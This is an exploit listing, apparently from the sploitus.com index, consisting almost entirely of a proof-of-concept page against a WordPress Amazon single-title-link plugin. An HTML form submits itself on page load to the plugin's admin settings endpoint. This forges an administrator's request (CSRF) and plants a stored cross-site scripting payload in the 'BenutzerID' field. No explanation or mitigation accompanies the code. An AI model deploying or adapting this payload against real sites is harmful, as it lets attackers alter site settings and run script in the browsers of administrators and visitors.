Share
## https://sploitus.com/exploit?id=WPEX-ID:A6B3E927-41E2-4E48-B9E1-8C58A1B9A933
<form id="test" action="https://example.com/wp-admin/options-general.php?page=amazon-einzeltitellinks.php" method="POST">
    <input type="text" name="BenutzerID" value='hacked"><img src onerror=alert(/XSS/)>'>
    <input type="text" name="amazon_einzeltitel_links_name" value="">
    <input type="text" name="amazon_einzeltitel_rechts_name" value="">
    <input type="text" name="amazon_einzeltitel_none_name" value="">
    <input type="text" name="amazon_einzeltitel_link_name" value="">
    <input type="text" name="amazon_einzeltitel_rahmen_name" value="">
    <input type="text" name="amazon_einzeltitel_titelfarbe_name" value="">
    <input type="text" name="amazon_einzeltitel_preisfarbe_name" value="">
    <input type="text" name="amazon_einzeltitel_hintergrundfarbe_name" value="">
    <input type="text" name="amazonUpdate" value="Speichern">
</form>
<script>
    document.getElementById("test").submit();
</script>